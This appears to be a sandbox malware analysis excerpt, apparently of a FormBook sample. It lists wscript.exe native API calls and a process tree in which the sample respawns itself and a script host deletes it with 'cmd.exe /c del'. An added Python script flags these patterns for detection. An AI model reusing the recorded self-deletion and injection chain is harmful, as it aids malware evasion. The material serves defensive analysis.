Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052699A0 NtCreateSection,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052695D0 NtClose,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269860 NtQuerySystemInformation,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269840 NtDelayExecution,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269710 NtQueryInformationToken,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269780 NtMapViewOfSection,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269FE0 NtCreateMutant,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269660 NtAllocateVirtualMemory,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269650 NtQueryValueKey,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269A50 NtCreateFile,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052696E0 NtFreeVirtualMemory,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052696D0 NtCreateKey,LdrInitializeThunk, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269520 NtWaitForSingleObject, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0526AD30 NtSetContextThread, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269560 NtWriteFile, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269950 NtQueueApcThread, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052695F0 NtQueryInformationFile, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052699D0 NtCreateProcessEx, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269820 NtEnumerateKey, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0526B040 NtSuspendThread, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052698A0 NtWriteVirtualMemory, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052698F0 NtReadVirtualMemory, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269730 NtQueryVirtualMemory, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269B00 NtSetValueKey, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0526A710 NtOpenProcessToken, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269760 NtOpenProcess, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269770 NtSetInformationFile, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0526A770 NtOpenThread, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_052697A0 NtUnmapViewOfSection, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_0526A3B0 NtGetContextThread, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269A20 NtResumeThread, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269A00 NtProtectVirtualMemory, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269610 NtEnumerateValueKey, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269A10 NtQuerySection, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269670 NtQueryInformationProcess, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_05269A80 NtOpenDirectoryObject, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DD85E0 NtCreateFile, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DD8690 NtReadFile, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DD87C0 NtAllocateVirtualMemory, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DD8710 NtClose, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DD85DA NtCreateFile, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DD868C NtReadFile, |
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 9_2_00DD868A NtReadFile, |
Source: unknown | Process created: C:\Users\user\Desktop\UaTmOE6yP9.exe 'C:\Users\user\Desktop\UaTmOE6yP9.exe' |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Process created: C:\Users\user\Desktop\UaTmOE6yP9.exe C:\Users\user\Desktop\UaTmOE6yP9.exe |
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe' |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Process created: C:\Users\user\Desktop\UaTmOE6yP9.exe C:\Users\user\Desktop\UaTmOE6yP9.exe |
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe' |
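The seven Process created lines above give the tree for this run: the sample relaunches its own image twice, explorer.exe (which the sample never launched) starts a wscript.exe with no script argument, and that wscript.exe removes the original sample through cmd.exe /c del. The following is an added example written for this report, not a Joe Sandbox signature: it parses those lines verbatim and applies three heuristics (script host with an empty command line, self-spawn, deletion of an executable that ran elsewhere in the trace). The heuristics, their names and the command-line splitting rule are this example's own.

```python
"""Process-tree triage over the 'Process created' lines of this report.
Added example, not a Joe Sandbox signature: the input lines are copied
verbatim from the report; the parser and the three heuristics are this
example's own."""
import re
from collections import defaultdict

# Copied verbatim from the report's "Process created" lines.
PROCESS_LINES = [
    r"Source: unknown | Process created: C:\Users\user\Desktop\UaTmOE6yP9.exe 'C:\Users\user\Desktop\UaTmOE6yP9.exe' |",
    r"Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Process created: C:\Users\user\Desktop\UaTmOE6yP9.exe C:\Users\user\Desktop\UaTmOE6yP9.exe |",
    r"Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe |",
    r"Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe' |",
    r"Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |",
    r"Source: C:\Users\user\Desktop\UaTmOE6yP9.exe | Process created: C:\Users\user\Desktop\UaTmOE6yP9.exe C:\Users\user\Desktop\UaTmOE6yP9.exe |",
    r"Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\UaTmOE6yP9.exe' |",
]

LINE_RE = re.compile(
    r"^Source: (?P<parent>.+?) \| Process created: (?P<image>\S+)\s*(?P<cmdline>.*?)\s*\|?\s*$")
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
DEL_RE = re.compile(r"""/c\s+del\s+['"]?(?P<target>[^'"]+?\.exe)['"]?""", re.IGNORECASE)


def parse_line(line):
    """Split one report line into parent image, child image and command line."""
    m = LINE_RE.match(line)
    if not m:
        raise ValueError(f"unrecognised line: {line!r}")
    return m.groupdict()


def split_program(cmdline):
    """First token of a Windows command line (quoted or bare) and the rest."""
    if cmdline[:1] in ("'", '"'):
        end = cmdline.find(cmdline[0], 1)
        if end != -1:
            return cmdline[1:end], cmdline[end + 1:].strip()
    head, _, rest = cmdline.partition(" ")
    return head, rest.strip()


def args_of(image, cmdline):
    """Arguments with the leading program token dropped when it names the
    image (case-insensitive, as Windows paths are); otherwise the whole
    command line, which is how the report renders cmd.exe's '/c del'."""
    prog, rest = split_program(cmdline)
    return rest if prog.lower() == image.lower() else cmdline


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def children_of(lines):
    """parent image -> list of child images, in creation order."""
    tree = defaultdict(list)
    for p in (parse_line(l) for l in lines):
        tree[p["parent"]].append(p["image"])
    return dict(tree)


def findings(lines):
    """(heuristic, parent, subject) triples for the three patterns below."""
    procs = [parse_line(l) for l in lines]
    traced = {p["image"].lower() for p in procs}
    hits = []
    for p in procs:
        name = basename(p["image"])
        args = args_of(p["image"], p["cmdline"])
        # 1. A script host started with nothing to run: wscript.exe with an
        #    empty command line has no legitimate job, and here it is the
        #    process whose memory matched the FormBook Yara rules (process 9).
        if name in SCRIPT_HOSTS and not args:
            hits.append(("script-host-without-script", p["parent"], p["image"]))
        # 2. A process launching a second copy of its own image, seen twice
        #    in this trace before the payload surfaced in other processes.
        if p["parent"].lower() == p["image"].lower():
            hits.append(("self-spawn", p["parent"], p["image"]))
        # 3. cmd.exe deleting an executable that ran elsewhere in the trace:
        #    the original sample removed by a process outside its own subtree.
        if name == "cmd.exe":
            m = DEL_RE.search(args)
            if m and m.group("target").lower() in traced:
                hits.append(("deletes-traced-executable", p["parent"], m.group("target")))
    return hits


if __name__ == "__main__":
    for parent, kids in children_of(PROCESS_LINES).items():
        print(parent, "->", kids)
    for hit in findings(PROCESS_LINES):
        print(*hit)
```

The tree shows why the report's Network Connect lines are attributed to explorer.exe: wscript.exe has explorer.exe as its parent although explorer.exe never appears as a created process, so the chain from the sample to the beaconing process is not visible through parent-child links alone. The three heuristics are deliberately narrow; the empty-command-line script host is the one most worth keeping in a detection rule, since a legitimate wscript.exe start always carries a script path.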